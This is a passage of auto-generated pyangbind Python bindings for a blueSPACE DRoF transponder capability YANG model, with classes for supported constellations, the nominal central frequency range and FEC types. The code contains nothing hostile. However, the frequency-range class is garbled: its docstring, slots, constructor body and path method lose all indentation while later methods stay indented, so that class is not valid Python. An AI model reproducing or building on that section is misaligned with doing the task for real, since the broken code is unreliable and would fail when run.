    self.__mod_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
    self.__constellation_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)

    load = kwargs.pop("load", None)
    if args:
      # A single positional argument is treated as a source object to copy
      # from; it must expose every element listed in _pyangbind_elements.
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          # Element is still at its default on the source object - skip it.
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          # Propagate the `load` flag so setters know this is a data load.
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # Absolute YANG path of this container; fall back to the static path
    # when the instance has not been attached to a parent.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return ['DRoF-TP-capability', 'supportable-constellation']

  def _get_constellation_id(self):
    """
    Getter method for constellation_id, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/constellation_id (string)
    """
    return self.__constellation_id

  def _set_constellation_id(self, v, load=False):
    """
    Setter method for constellation_id, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/constellation_id (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_constellation_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_constellation_id() directly.
    """
    # constellation-id is a list key: once this entry lives inside an
    # instantiated list (i.e. has a parent) it may only change via load.
    parent = getattr(self, "_parent", None)
    if parent is not None and load is False:
      raise AttributeError("Cannot set keys directly when" +
                             " within an instantiated list")

    if hasattr(v, "_utype"):
      # Unwrap a previously-wrapped pyangbind value to its native type.
      v = v._utype(v)
    try:
      # Re-wrap the value as the leaf's string type; a failure here means
      # the supplied value is not string-compatible.
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """constellation_id must be of a type compatible with string""",
          'defined-type': "string",
          'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
        })
    self.__constellation_id = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_constellation_id(self):
    # Reset the leaf to a freshly-constructed default instance.
    self.__constellation_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)

  def _get_mod_type(self):
    """
    Getter method for mod_type, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/mod_type (identityref)
    """
    return self.__mod_type

  def _set_mod_type(self, v, load=False):
    """
    Setter method for mod_type, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/mod_type (identityref)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mod_type is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mod_type() directly.
    """
    if hasattr(v, "_utype"):
      # Unwrap a previously-wrapped pyangbind value to its native type.
      v = v._utype(v)
    try:
      # Re-wrap the value against the identityref's allowed-identity map;
      # a failure here means v is not one of the listed modulation names.
      t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """mod_type must be of a type compatible with identityref""",
          'defined-type': "blueSPACE-DRoF-TP-capability:identityref",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 
'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)""",
        })
    self.__mod_type = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_mod_type(self):
    # Reset the leaf to a freshly-constructed default instance.
    self.__mod_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)

  # Both leaves are config: false, so only read-only properties (no public
  # setters) are exposed.
  constellation_id = __builtin__.property(_get_constellation_id)
  mod_type = __builtin__.property(_get_mod_type)

  _pyangbind_elements = OrderedDict([('constellation_id', constellation_id), ('mod_type', mod_type), ])
class yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-nominal-central-frequency-range. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__adjustment_granularity','__grid_type','__lower_frequency','__upper_frequency',)
_yang_name = 'supportable-nominal-central-frequency-range'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__upper_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__lower_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__adjustment_granularity = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__grid_type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability', 'supportable-nominal-central-frequency-range']
  def _get_adjustment_granularity(self):
    """
    Getter method for adjustment_granularity, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/adjustment_granularity (string)
    YANG Description: e.g 6.25GHz
    """
    # Returns the YANGDynClass-wrapped string leaf; exposed read-only via the
    # class-level property (the leaf is config false).
    return self.__adjustment_granularity
  def _set_adjustment_granularity(self, v, load=False):
    """
    Setter method for adjustment_granularity, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/adjustment_granularity (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_adjustment_granularity is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_adjustment_granularity() directly.
    YANG Description: e.g 6.25GHz
    """
    # Unwrap a pyangbind dynamic value to its underlying native type first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Re-wrap in YANGDynClass; a type-incompatible value raises below.
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      # Surface a structured error describing the expected YANG type.
      raise ValueError({
        'error-string': """adjustment_granularity must be of a type compatible with string""",
        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__adjustment_granularity = t
    # Notify the registered change hook, when one exists.
    if hasattr(self, '_set'):
      self._set()
  def _unset_adjustment_granularity(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__adjustment_granularity = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
  def _get_grid_type(self):
    """
    Getter method for grid_type, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/grid_type (string)
    YANG Description: e.g Flex
    """
    # Returns the YANGDynClass-wrapped string leaf (read-only property below).
    return self.__grid_type
  def _set_grid_type(self, v, load=False):
    """
    Setter method for grid_type, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/grid_type (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_grid_type is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_grid_type() directly.
    YANG Description: e.g Flex
    """
    # Unwrap a pyangbind dynamic value to its underlying native type first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Re-wrap in YANGDynClass; a type-incompatible value raises below.
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      # Surface a structured error describing the expected YANG type.
      raise ValueError({
        'error-string': """grid_type must be of a type compatible with string""",
        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__grid_type = t
    # Notify the registered change hook, when one exists.
    if hasattr(self, '_set'):
      self._set()
  def _unset_grid_type(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__grid_type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
  def _get_lower_frequency(self):
    """
    Getter method for lower_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/lower_frequency (string)
    YANG Description: e.g 191.494THz
    """
    # Returns the YANGDynClass-wrapped string leaf (read-only property below).
    return self.__lower_frequency
  def _set_lower_frequency(self, v, load=False):
    """
    Setter method for lower_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/lower_frequency (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_lower_frequency is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_lower_frequency() directly.
    YANG Description: e.g 191.494THz
    """
    # Unwrap a pyangbind dynamic value to its underlying native type first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Re-wrap in YANGDynClass; a type-incompatible value raises below.
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      # Surface a structured error describing the expected YANG type.
      raise ValueError({
        'error-string': """lower_frequency must be of a type compatible with string""",
        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__lower_frequency = t
    # Notify the registered change hook, when one exists.
    if hasattr(self, '_set'):
      self._set()
  def _unset_lower_frequency(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__lower_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
  def _get_upper_frequency(self):
    """
    Getter method for upper_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/upper_frequency (string)
    YANG Description: e.g 195,256THz
    """
    # Returns the YANGDynClass-wrapped string leaf (read-only property below).
    return self.__upper_frequency
  def _set_upper_frequency(self, v, load=False):
    """
    Setter method for upper_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/upper_frequency (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_upper_frequency is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_upper_frequency() directly.
    YANG Description: e.g 195,256THz
    """
    # Unwrap a pyangbind dynamic value to its underlying native type first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      # Re-wrap in YANGDynClass; a type-incompatible value raises below.
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      # Surface a structured error describing the expected YANG type.
      raise ValueError({
        'error-string': """upper_frequency must be of a type compatible with string""",
        'defined-type': "string",
        'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
      })
    self.__upper_frequency = t
    # Notify the registered change hook, when one exists.
    if hasattr(self, '_set'):
      self._set()
  def _unset_upper_frequency(self):
    # Reset the leaf to a fresh, unset YANGDynClass instance.
    self.__upper_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
adjustment_granularity = __builtin__.property(_get_adjustment_granularity)
grid_type = __builtin__.property(_get_grid_type)
lower_frequency = __builtin__.property(_get_lower_frequency)
upper_frequency = __builtin__.property(_get_upper_frequency)
_pyangbind_elements = OrderedDict([('adjustment_granularity', adjustment_granularity), ('grid_type', grid_type), ('lower_frequency', lower_frequency), ('upper_frequency', upper_frequency), ])
class yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-FEC. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # __slots__ keeps per-instance memory low; the double-underscore entries are
  # the name-mangled private stores for the two YANG leaves of this list entry.
  __slots__ = ('_path_helper', '_extmethods', '__fec_id','__fec_type',)
  _yang_name = 'supportable-FEC'
  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    self._path_helper = False
    self._extmethods = False
    # fec-id is the list key (is_keyval=True); both leaves are operational
    # state (is_config=False).
    self.__fec_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    # fec-type is an identityref restricted to the HD-FEC / SD-FEC identities
    # (accepted both with and without the module prefix).
    self.__fec_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
    load = kwargs.pop("load", None)
    # Copy-constructor support: a single positional argument must expose every
    # element of this container; changed elements are copied via the setters.
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
  def _path(self):
    # Absolute YANG path: parent path plus this node's name, or the
    # schema-rooted default when detached.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return ['DRoF-TP-capability', 'supportable-FEC']
  def _get_fec_id(self):
    """
    Getter method for fec_id, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_id (string)
    """
    return self.__fec_id
  def _set_fec_id(self, v, load=False):
    """
    Setter method for fec_id, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_id (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_fec_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_fec_id() directly.
    """
    # List keys may not be rewritten once the entry is part of a list, except
    # during a load (deserialization) pass.
    parent = getattr(self, "_parent", None)
    if parent is not None and load is False:
      raise AttributeError("Cannot set keys directly when" +
        " within an instantiated list")
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
        'error-string': """fec_id must be of a type compatible with string""",
